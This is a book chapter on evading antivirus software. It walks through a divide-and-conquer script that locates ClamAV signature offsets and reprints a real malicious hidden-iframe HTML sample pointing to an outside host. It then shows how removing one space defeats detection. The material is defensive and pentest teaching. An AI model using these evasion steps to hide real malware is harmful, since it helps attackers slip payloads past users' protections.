The Antivirus Hacker's Handbook (2015)

Part II. Antivirus Software Evasion

In This Part

1. Chapter 6: Antivirus Software Evasion

2. Chapter 7: Evading Signatures

3. Chapter 8: Evading Scanners

4. Chapter 9: Evading Heuristic Engines

5. Chapter 10: Identifying the Attack Surface

6. Chapter 11: Denial of Service

Chapter 6. Antivirus Software Evasion

Antivirus evasion techniques are used by malware writers, as well as by penetration testers and vulnerability researchers, to bypass one or more antivirus software applications. Evasion ensures that the payload the attacker wants to execute on the target machine or machines is not blocked by antivirus software and can perform the required actions.

Evasion techniques for bypassing antivirus software can be divided into two categories: static and dynamic. Static means that you simply want to bypass detection based on the antivirus's signature-scanning algorithms, while dynamic means that you want to bypass detection of the sample's behavior when it is executed. Statically, you try to bypass signatures that rely on cyclic redundancy checks (CRCs), fuzzy hashing techniques, or cryptographic hashes by altering the binary contents of the sample, or you change the graph of the program so that basic block- and function-based signatures are tricked into treating the program as a different one. To evade detection dynamically, the sample should change its behavior when it detects that it is running inside a sandbox or an antivirus emulator, or it could execute an instruction that the emulator does not support. It could also try to escape from the sandbox or the “safe execution” environment set up by the antivirus software so that the malicious program can run without being monitored.

Therefore, to evade detection, you can use a plethora of different techniques. Some of them will be covered in the following sections, but first, you will get a brief introduction to the art of antivirus evasion.

Who Uses Antivirus Evasion Techniques?

Antivirus evasion techniques are a controversial topic. Typical questions that can be heard or read regarding this topic are: Why would anyone want to evade antivirus software if it is not for doing something bad? Isn't antivirus evasion something that only “bad guys” do? While malware writers obviously use evasion techniques to bypass antivirus detection and do harmful things, legitimate security professionals also use evasion techniques, mainly in the penetration testing field. A security professional hired to penetrate a corporation's network will at some point need to bypass the detection techniques employed by the endpoint software of the target machines in order to execute, for example, a Meterpreter payload and continue the assessment. Evasion techniques can also be used to test the antivirus solution deployed in an organization. Security professionals use evasion techniques to answer questions such as the following:

· Is it possible to evade dynamic detection easily?

· Is it possible to bypass static detection by simply changing a few bits in recent malware samples or with some specific malware?

Asking and answering such questions can help organizations protect themselves against malicious attacks. In their products, antivirus companies use various systems for statically and dynamically detecting both known and unknown malware (usually based on reputation systems or on monitoring program execution to determine whether the behavior looks suspicious). Sadly, however, bypassing antivirus detection is usually an easy task. It often takes only minutes, or hours when more than one antivirus scanner must be bypassed.

In 2008, an antivirus evasion contest called the “Race to Zero” was held at the DefCon conference in Las Vegas. During the contest, participants were given a sample set of viruses and malicious code to modify and upload through the contest portal. The portal then used antivirus scanners to check whether the uploaded samples were detected and by which antivirus solution. The first individual or team whose newly modified sample bypassed all of the antivirus engines undetected would win that round. According to the organizers, each new round was designed to be more complex and challenging. The results: all AVs were evaded, with the single exception of a Word 97-based exploit, because nobody had this software.

Antivirus companies were angered and considered this contest a bad practice. Roger Thompson, CRO of AVG Technologies, reflected the view of some antivirus companies when he called it a contest for writing “more viruses.” Paul Ferguson, from Trend Micro, said that it was a bad idea to encourage hackers to take part in a contest for bypassing antivirus solutions, stating that it was “a little over the top.” Unsurprisingly, most people in the antivirus industry complained. Despite their complaints, the contest's results showed that bypassing antivirus products is not a big challenge. Indeed, the contest was considered too easy, and it was never repeated.

Discovering Where and How Malware Is Detected

A key part of antivirus evasion is determining how malware is detected. Is a specific sample detected via static means, using some signature, or is it detected through dynamic techniques such as monitoring behavior for suspicious actions or by a reputation system that prevents the execution of completely unknown software? If it is detected by a specific signature, what is that signature based on? Is it based on the functions imported by the portable executable (PE) sample? Is it based on the entropy of a code or data section in the sample? Or is it finding some specific string in the sample, inside one of its sections or in an embedded file within the sample? The following sections will cover some old and somewhat new tricks to determine how and where a known malware sample is detected.
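To make the entropy question concrete, here is a minimal sketch of how the Shannon entropy of a byte buffer could be computed. The function name shannon_entropy and the two sample buffers are illustrative assumptions; nothing here is taken from a real antivirus engine, and real products may measure entropy differently.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    # Sum p * log2(1/p) over every byte value that occurs in the buffer.
    return sum((n / total) * math.log2(total / n) for n in counts.values())

low = shannon_entropy(b"\x00" * 1024)      # constant data: no variety at all
high = shannon_entropy(bytes(range(256)))  # every byte value exactly once
print(low, high)
```

Packed or encrypted sections tend toward the high end of this scale, which is why a signature or heuristic might key on the value for a code or data section.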

Old Tricks for Determining Where Malware Is Detected: Divide and Conquer

The oldest trick for bypassing antivirus detection based on static signatures, such as CRCs or simple pattern matching, is to split the file into smaller parts and analyze all of them separately. The chunk where the detection is still triggered is the part of the file you want to change to evade the antivirus software you are targeting. While this approach may appear naïve and unlikely to work most of the time, it works very well against checksum-based signatures or pattern matching. However, you will need to adapt this approach to the specific file format you are researching and testing against. For example, if you need to bypass the detection of a PE file, splitting it into parts is unlikely to help, as the antivirus kernel will almost certainly first check whether the file is a PE. When the file is split into chunks of data, the chunks no longer have a valid PE header; therefore, nothing will be detected. In this case, the approach you can use is similar, but instead of splitting the file into chunks, you create smaller versions of the file with increasing sizes. That is, the first file contains the first 256 bytes of the original, the next file contains the first 512 bytes, and so on.
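The increasing-size idea can be sketched in memory before touching any files. This is only an illustration: toy_detector is a hypothetical stand-in for a scanner that flags a harmless marker string, and the names prefixes and first_detected_prefix are invented for this example.

```python
BLOCK_SIZE = 256  # same step size as described in the text

def prefixes(data: bytes, block_size: int = BLOCK_SIZE):
    """Yield (end_offset, prefix) pairs: the first 256 bytes, 512 bytes, and so on."""
    end = block_size
    while end < len(data):
        yield end, data[:end]
        end += block_size
    yield len(data), data  # the final prefix is the complete buffer

def toy_detector(buf: bytes) -> bool:
    # Hypothetical stand-in for a real scanner: flags a harmless marker.
    return b"MARKER" in buf

def first_detected_prefix(data: bytes):
    """Return the end offset of the smallest prefix the detector flags, or None."""
    for end, prefix in prefixes(data):
        if toy_detector(prefix):
            return end
    return None

# 700 filler bytes, the marker, then more filler.
sample = b"A" * 700 + b"MARKER" + b"B" * 300
print(first_detected_prefix(sample))
```

Because every prefix starts at offset 0, any header the format requires stays intact, which is the point of using prefixes rather than independent chunks.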

When one of the newly created files is detected, you know in which chunk and at what offset it is detected. If, say, it is detected in the block at offset 2,048, you can continue splitting the file, byte by byte, until you eventually get the actual offset where the signature matches (or you can open the file in a hexadecimal editor to check whether something special appears, such as a certain byte sequence, and manually make some modifications). At that point, you know exactly which offset in the file causes the detection to trigger. You also need to work out how the scanner is detecting your sample in that buffer. In 90 percent of cases, it will be a simple, old-fashioned static signature based on a checksum (such as a CRC), on pattern matching, or on a mix of them. In some cases, samples can be detected via their cryptographic hashes (for the entire file or for a chunk of data), most probably MD5. In this case, naturally, you only need to change a single bit in the file contents or in the specific chunk of data: because a cryptographic hash aims to identify a file uniquely, the hash will change and the sample will not be detected anymore.
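The single-bit claim is easy to check with Python's standard hashlib and zlib modules. The buffer below is a harmless placeholder chosen for this sketch, not the sample used later in the chapter.

```python
import hashlib
import zlib

original = b"<html><body>harmless example content</body></html>"

# Flip the lowest bit of the last byte; every other byte is unchanged.
modified = original[:-1] + bytes([original[-1] ^ 0x01])

md5_before = hashlib.md5(original).hexdigest()
md5_after = hashlib.md5(modified).hexdigest()
crc_before = zlib.crc32(original)
crc_after = zlib.crc32(modified)

print(md5_before, md5_after)
print("%08x %08x" % (crc_before, crc_after))
```

Both values change, so a signature keyed on the exact MD5 or CRC of the whole buffer no longer matches after the one-bit edit.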

Evading a Simple Signature-Based Detection with the Divide and Conquer Trick

This experiment uses a sample with the MD5 hash 8834639bd8664aca00b5599aaab833ea, detected by ClamAV as Exploit.HTML.IFrame-6. This specific malware sample is rather inoffensive as the injected iframe points to a URL that is no longer available. If you scan this file with the clamscan tool, you will see the following output:

$ clamscan -i 8834639bd8664aca00b5599aaab833ea

8834639bd8664aca00b5599aaab833ea: Exploit.HTML.IFrame-6 FOUND

----------- SCAN SUMMARY -----------

Known viruses: 3700704

Engine version: 0.98.1

Scanned directories: 0

Scanned files: 1

Infected files: 1

Data scanned: 0.01 MB

Data read: 0.01 MB (ratio 1.00:1)

Time: 5.509 sec (0 m 5 s)

As you can see, this file is detected by ClamAV. Now, you will try to bypass this detection using the technique that was just discussed. To do so, you use a small Python script that simply breaks the file into parts incrementally: it creates many smaller files, with a size incremented by 256 bytes for each file. The script is as follows:

#!/usr/bin/python

import os
import sys
import time

#-----------------------------------------------------------------------
def log(msg):
    print("[%s] %s" % (time.asctime(), msg))

#-----------------------------------------------------------------------
class CSplitter:
    def __init__(self, filename):
        # Read the whole sample into memory
        with open(filename, "rb") as f:
            self.buf = f.read()
        self.block_size = 256

    def split(self, directory):
        # Round up so the final, possibly partial, block is written too
        blocks = (len(self.buf) + self.block_size - 1) // self.block_size
        for i in range(1, blocks + 1):
            # Each output file holds the original bytes from offset 0 to `end`
            end = min(i * self.block_size, len(self.buf))
            path = os.path.join(directory, "block_%d" % i)
            log("Writing file %s for block %d (until offset 0x%x)" %
                (path, i, end))
            with open(path, "wb") as f:
                f.write(self.buf[:end])

#-----------------------------------------------------------------------
def main(in_path, out_path):
    splitter = CSplitter(in_path)
    splitter.split(out_path)

#-----------------------------------------------------------------------
def usage():
    print("Usage: %s <in file> <directory>" % sys.argv[0])

if __name__ == "__main__":
    if len(sys.argv) != 3:
        usage()
    else:
        main(sys.argv[1], sys.argv[2])

All right, with the sample and this small tool on hand, you execute the command python split.py file directory in order to create many smaller files with the original contents up to the current offset:

$ python split.py 8834639bd8664aca00b5599aaab833ea blocks/

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_1 for block 1 (until offset 0x100)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_2 for block 2 (until offset 0x200)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_3 for block 3 (until offset 0x300)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_4 for block 4 (until offset 0x400)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_5 for block 5 (until offset 0x500)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_6 for block 6 (until offset 0x600)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_7 for block 7 (until offset 0x700)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_8 for block 8 (until offset 0x800)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_9 for block 9 (until offset 0x900)
[Thu Dec 4 03:46:31 2014] Writing file blocks/block_10 for block 10 (until offset 0xa00)

(…more lines skipped…)

After creating the smaller files, you again execute the clamscan tool against the directory where all the new files you split are located:

$ clamscan -i blocks/block_*

blocks/block_10: Exploit.HTML.IFrame-6 FOUND

blocks/block_11: Exploit.HTML.IFrame-6 FOUND

blocks/block_12: Exploit.HTML.IFrame-6 FOUND

blocks/block_13: Exploit.HTML.IFrame-6 FOUND

blocks/block_14: Exploit.HTML.IFrame-6 FOUND

blocks/block_15: Exploit.HTML.IFrame-6 FOUND

blocks/block_16: Exploit.HTML.IFrame-6 FOUND

blocks/block_17: Exploit.HTML.IFrame-6 FOUND

blocks/block_18: Exploit.HTML.IFrame-6 FOUND

blocks/block_19: Exploit.HTML.IFrame-6 FOUND

blocks/block_2: Exploit.HTML.IFrame-6 FOUND

blocks/block_20: Exploit.HTML.IFrame-6 FOUND

blocks/block_21: Exploit.HTML.IFrame-6 FOUND

(…)
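The shell expands blocks/block_* in lexicographic order, so the lowest-numbered detected block is not necessarily the first line of the output. A minimal sketch for picking it out follows; it assumes only the "path: name FOUND" line format shown above, and the function name first_detected_block is invented for this example.

```python
import re

# Matches lines such as "blocks/block_10: Exploit.HTML.IFrame-6 FOUND".
FOUND_RE = re.compile(r"block_(\d+): (\S+) FOUND$")

def first_detected_block(scan_output: str):
    """Return the lowest block number reported as FOUND, or None."""
    numbers = []
    for line in scan_output.splitlines():
        match = FOUND_RE.search(line.strip())
        if match:
            numbers.append(int(match.group(1)))
    return min(numbers) if numbers else None

output = """\
blocks/block_10: Exploit.HTML.IFrame-6 FOUND
blocks/block_11: Exploit.HTML.IFrame-6 FOUND
blocks/block_19: Exploit.HTML.IFrame-6 FOUND
blocks/block_2: Exploit.HTML.IFrame-6 FOUND
blocks/block_20: Exploit.HTML.IFrame-6 FOUND
"""
print(first_detected_block(output))  # 2
```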

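The execution output shows that the signature starts matching at the second block: block_2 is the lowest-numbered file reported, although it is listed after block_19 because the shell expands the file names in lexicographic order. The signature therefore matches somewhere inside the first 512 bytes. If you open the file blocks/block_2 that you just created with a hexadecimal editor, you see the following: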

$ pyew blocks/block_2

0000 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 6D 65 74 <html><head><met

0010 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 43 6F a http-equiv="Co

0020 6E 74 65 6E 74 2D 54 79 70 65 22 20 63 6F 6E 74 ntent-Type" cont

0030 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D 6C 3B 20 ent="text/html;

0040 63 68 61 72 73 65 74 3D 77 69 6E 64 6F 77 73 2D charset=windows-

0050 31 32 35 31 22 3E 3C 74 69 74 6C 65 3E C0 FD F0 1251"><title>...

0060 EE EF F0 E5 F1 F1 20 2D 20 D6 E5 ED F2 F0 20 E4 ...... - ..... .

0070 E5 EB EE E2 EE E9 20 EF F0 E5 F1 F1 FB 3C 2F 74 ...... ......</t

0080 69 74 6C 65 3E 3C 2F 68 65 61 64 3E 0A 3C 62 6F itle></head>.<bo

0090 64 79 20 62 67 63 6F 6C 6F 72 3D 22 23 44 37 44 dy bgcolor="#D7D

00A0 32 44 32 22 20 41 4C 49 4E 4B 3D 22 23 44 41 30 2D2" ALINK="#DA0

00B0 30 30 30 22 20 56 4C 49 4E 4B 3D 22 23 39 38 39 000" VLINK="#989

00C0 32 38 44 22 20 4C 49 4E 4B 3D 22 23 34 31 33 41 28D" LINK="#413A

00D0 33 34 22 20 4C 45 46 54 4D 41 52 47 49 4E 3D 22 34" LEFTMARGIN="

00E0 30 22 20 52 49 47 48 54 4D 41 52 47 49 4E 3D 22 0" RIGHTMARGIN="

00F0 30 22 20 54 4F 50 4D 41 52 47 49 4E 3D 22 30 22 0" TOPMARGIN="0"

0100 3E 3C 69 66 72 61 6D 65 20 73 72 63 3D 22 68 74 ><iframe src="ht

0110 74 70 3A 2F 2F 69 6E 74 65 72 6E 65 74 6E 61 6D tp://internetnam

0120 65 73 74 6F 72 65 2E 63 6E 2F 69 6E 2E 63 67 69 estore.cn/in.cgi

0130 3F 69 6E 63 6F 6D 65 32 36 22 20 77 69 64 74 68 ?income26" width

0140 3D 31 20 68 65 69 67 68 74 3D 31 20 73 74 79 6C =1 height=1 styl

0150 65 3D 22 76 69 73 69 62 69 6C 69 74 79 3A 20 68 e="visibility: h

0160 69 64 64 65 6E 22 3E 3C 2F 69 66 72 61 6D 65 3E idden"></iframe>

0170 0A 3C 54 41 42 4C 45 20 41 4C 49 47 4E 3D 22 43 .<TABLE ALIGN="C

0180 45 4E 54 45 52 22 20 56 41 4C 49 47 4E 3D 22 54 ENTER" VALIGN="T

0190 4F 50 22 20 42 4F 52 44 45 52 3D 22 30 22 20 57 OP" BORDER="0" W

01A0 49 44 54 48 3D 22 37 37 34 22 20 63 65 6C 6C 70 IDTH="774" cellp

01B0 61 64 64 69 6E 67 3D 22 30 22 20 63 65 6C 6C 73 adding="0" cells

01C0 70 61 63 69 6E 67 3D 22 30 22 20 62 67 63 6F 6C pacing="0" bgcol

01D0 6F 72 3D 22 23 44 46 44 44 44 44 22 3E 0A 3C 54 or="#DFDDDD">.<T

01E0 52 3E 0A 3C 54 44 20 57 49 44 54 48 3D 22 32 22 R>.<TD WIDTH="2"

01F0 20 72 6F 77 73 70 61 6E 3D 22 31 33 22 20 62 61 rowspan="13" ba

Notice the <iframe> tag inside this chunk of data from the original file. An educated guess is that the signature is looking for this tag and, probably, some of its attributes, as it seems to be a generic iframe-related signature. How can you modify the HTML tag or its attributes so it is not detected? Start by changing <iframe src="…" to <iframe src='…'. As simple as it looks (you are just changing double quotes to single quotes), it may work in some cases. Scanning the modified file gives this result:

$ clamscan modified_block

modified_block: Exploit.HTML.IFrame-6 FOUND

----------- SCAN SUMMARY -----------

Known viruses: 3700704

Engine version: 0.98.1

Scanned directories: 0

Scanned files: 1

Infected files: 1

Data scanned: 0.00 MB

Data read: 0.00 MB (ratio 0.00:1)

Time: 5.581 sec (0 m 5 s)

It does not work this time. So, you try another change: what about removing the space in the style="visibility: hidden" attribute of the iframe tag? The change is as simple as the following diff output shows (the quote change from the first attempt is still present):

$ diff modified_block blocks/block_2

2c2

< <body bgcolor="#D7D2D2" ALINK="#DA0000" VLINK="#98928D" LINK="#413A34"

LEFTMARGIN="0" RIGHTMARGIN="0" TOPMARGIN="0"><iframe

src='http://internetnamestore.cn/in.cgi?income26" width=1 height=1

style="visibility:hidden"></iframe>

---

> <body bgcolor="#D7D2D2" ALINK="#DA0000" VLINK="#98928D" LINK="#413A34"

LEFTMARGIN="0" RIGHTMARGIN="0" TOPMARGIN="0"><iframe

src="http://internetnamestore.cn/in.cgi?income26" width=1 height=1

style="visibility: hidden"></iframe>

Another easy change, isn't it? And if you run the clamscan command-line scanner against your modified file, you see the following:

$ clamscan modified_block

modified_block: OK

----------- SCAN SUMMARY -----------

Known viruses: 3700704

Engine version: 0.98.1

Scanned directories: 0

Scanned files: 1

Infected files: 0

Data scanned: 0.00 MB

Data read: 0.00 MB (ratio 0.00:1)

Time: 5.516 sec (0 m 5 s)

The scanner no longer detects anything in your modified file. Now, all you have to do is modify the original sample, removing the space, and you are done: you just evaded detection (and, apparently, most of ClamAV's generic iframe detections).

Note

This technique is not really required to evade ClamAV detections. Because ClamAV is an open-source tool, you can unpack the signatures using sigtool and look up the detection name and the signature type for a specific kind of malware. In the previous example, you would discover a hexadecimal pattern that matches the visibility: hidden substring as part of the signature. If you have the plain-text signatures, it is easier to evade detection: you can check how the malware researchers decided to detect the sample and change the file so that the scanner does not catch it anymore. It can be argued that this makes an open-source anti-malware tool less effective than a commercial solution. However, keep in mind that signatures are always distributed with antivirus products, whether they are open source or not. The only difference is that unpackers for the signatures are not distributed by the antivirus company and must be written by the person or team researching the antivirus. Once an unpacker for the signatures of a specific antivirus product has been written, those signatures can be bypassed with the same level of difficulty.
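A hexadecimal pattern of this kind is nothing more than the raw bytes of the substring. The sketch below uses a hypothetical pattern consisting only of the ASCII bytes of visibility: hidden and a plain substring search; it does not reproduce the actual ClamAV signature or its matching engine, and the HTML buffer is a harmless placeholder.

```python
# Hypothetical hex pattern: just the ASCII bytes of "visibility: hidden".
PATTERN_HEX = "7669736962696c6974793a2068696464656e"
pattern = bytes.fromhex(PATTERN_HEX)

def matches(buf: bytes) -> bool:
    """Plain substring search, the simplest form of pattern matching."""
    return pattern in buf

original = (b'<iframe src="http://example.invalid/" '
            b'style="visibility: hidden"></iframe>')
# Same markup with the single space after the colon removed.
modified = original.replace(b"visibility: hidden", b"visibility:hidden")

print(pattern)
print(matches(original), matches(modified))
```

The two buffers render identically in a browser, but only the first contains the exact byte sequence, which is why a literal pattern is so brittle.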

Binary Instrumentation and Taint Analysis

Binary instrumentation is the ability to monitor, at the (assembly) instruction level, everything that a program is doing. Taint analysis is the ability to track the flow of data after it is read with functions such as fread or recv and to determine how that input data influences the code flow. Taint analysis routines, now a popular approach for program analysis, can be written using various binary instrumentation toolkits. Several such toolkits are freely available, including the closed-source (and very restrictively licensed) Intel PIN and the open-source DynamoRIO, and they can be used to instrument a program such as an antivirus command-line scanner. You may be tempted to implement a rather complex taint analysis module for your favorite binary instrumentation toolkit so you can trace where your inputs (the malware sample's bytes) are used, how the data flows, and how it is finally detected, in an automatic and elegant way. However, this approach is strongly discouraged.

There are many reasons why this approach is discouraged; some important ones are listed here:

· A file to be scanned, depending on the antivirus core, can be opened only once, a few times, or a number of times according to the number of different engines that the antivirus uses. Each antivirus engine will behave differently. Some antiviruses open a file thousands of times to analyze it.

· Even if a file is opened and read only once, almost all bytes in the file are touched (“tainted”) by some routine, and the number of traces you have to filter out is huge (on the order of gigabytes).

· Some antivirus engines have a bad habit of launching all signatures against all files or buffers, even after something has been detected. For example, assume that an antivirus engine has 100 detection routines and launches them against the input file. When the sample is detected at, say, the fifth detection routine, the AV engine will still launch the other 95 detection routines, making it very difficult to determine in which routine it was detected. Of course, if you write specific code for each antivirus engine and detection, your taint analysis program can lead you to the different code paths in the AV engine.

· The buffer read can be sent to other processes using many different methods (IPC, Unix sockets, and so on), and you may only get information back from the server telling whether or not it is infected, simply because the client-side part does not have the detection logic. In such a case, you may need to run your binary instrumentation and taint analysis tools on both the client and the server AV programs because, in some antivirus products, there can be routines in each process (for example, light routines in the client and heavy routines in the server).

· To make sense of the recorded taint data coming from the taint analysis engine, you have to modify your engine to consider various methods of scanning, file I/O, and socket API usages and how the buffers are passed around inside the AV core. The taint analysis engine must be adapted for any new antivirus kernel, which usually translates into writing ugly, hard-coded workarounds for a condition that happens only with a specific antivirus engine. This approach can become very time-consuming, especially when there are a large number of AV products on the market. For instance, VirusTotal employs around 40 antivirus products, and each one works differently.

· The complexity of writing such a system, even in the hypothetical situation where most of the corner cases can be worked around and most problems can be fixed, is not worth it. Bypassing static signatures is extremely easy nowadays.
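The trace-volume problem can be illustrated with a toy model. This is not real binary instrumentation: TracedBuffer, make_routine, and scan are hypothetical names, each "detection routine" is simply a loop that reads every byte, and the log records one entry per byte read, much as a crude taint log would.

```python
class TracedBuffer:
    """Wraps bytes and records every (routine, offset) read."""
    def __init__(self, data: bytes):
        self.data = data
        self.trace = []
        self.routine = None  # index of the routine currently running

    def read(self, offset: int) -> int:
        self.trace.append((self.routine, offset))
        return self.data[offset]

def make_routine(needle: int):
    # Toy detection routine: scans every byte looking for one value.
    def routine(buf: TracedBuffer) -> bool:
        hit = False
        for off in range(len(buf.data)):
            if buf.read(off) == needle:
                hit = True
        return hit
    return routine

def scan(buf: TracedBuffer, routines):
    verdicts = []
    for idx, routine in enumerate(routines):
        buf.routine = idx
        verdicts.append(routine(buf))  # keeps going even after a hit
    return verdicts

sample = bytes(range(64)) * 4                         # 256 bytes
routines = [make_routine(n) for n in range(60, 160)]  # 100 toy routines
buf = TracedBuffer(sample)
verdicts = scan(buf, routines)
print(len(buf.trace), verdicts.count(True))
```

Even in this tiny model, 100 routines over 256 bytes produce 25,600 trace entries, and every byte is touched by every routine, so the log alone says little about which routine actually made the detection.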

Summary

AV software evasion techniques are researched not only by malware writers but also by professional penetration testers who are hired by companies to test their infrastructures and need to bypass the deployed AV products. Evasion techniques are divided into two categories: static and dynamic.

· Static evasion techniques work by modifying the contents of the input file so that its hash or checksum changes and the file can no longer be detected by signature-based detections.

· The malware may use dynamic evasion techniques during execution, whether in a real or emulated environment. The malware can fingerprint the AV software and change its behavior accordingly to avoid being detected.

This chapter concluded by showing two methods that can be used to help understand how malware is detected by AV software:

· The divide and conquer technique can be used to split the malicious file into chunks and then scan each chunk separately to identify the chunk in the file that triggers the detection. Once the right chunk is identified, it becomes trivial to patch the input file and make it undetectable.

· Binary instrumentation and taint analysis, with toolkits such as Intel PIN or DynamoRIO, can be used to track the execution of the antivirus software. For instance, when the appropriate AV component is instrumented, it is possible to understand how the scanned input file is detected. Nonetheless, the volume of execution traces and logs generated by dynamic binary instrumentation makes this method very tedious and time-consuming.

While this chapter paved the way for the subsequent chapters in this book part, the next chapter will cover how to bypass signature-based detections for various input file formats.